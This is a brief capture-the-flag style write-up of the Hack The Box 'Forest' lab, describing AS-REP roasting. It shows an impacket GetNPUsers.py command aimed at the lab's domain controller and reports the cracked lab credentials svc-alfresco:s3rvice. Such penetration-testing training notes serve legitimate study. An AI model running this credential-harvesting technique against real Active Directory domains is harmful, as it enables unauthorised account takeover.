# Kerberos

### Kerbrute Enumeration

### AESEProast

With the valid users that we got based on the RPC ENumeration we can potentially get TGTs for these users and crack them. 

```
python3 GetNPUsers.py  htb.local/ -dc-ip 10.10.10.161 -no-pass -request -usersfile /home/kali/Forest/results/10.10.10.161/userlist.txt
```

I ran the following command to try to get a TGT.

The user svc-alfresco had a TGT. 

Cracking the TGT allowed me to get the following credentials. 

![](https://2669566420-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FQ72PDqIHnFVqGAB4T0Jl%2Fuploads%2FsQPvk3ChuIGhPf7xvLI4%2F2022-08-13_15-16.png?alt=media\&token=c5e8a8d3-4568-4155-925c-46bb2c5df21e)

svc-alfresco:s3rvice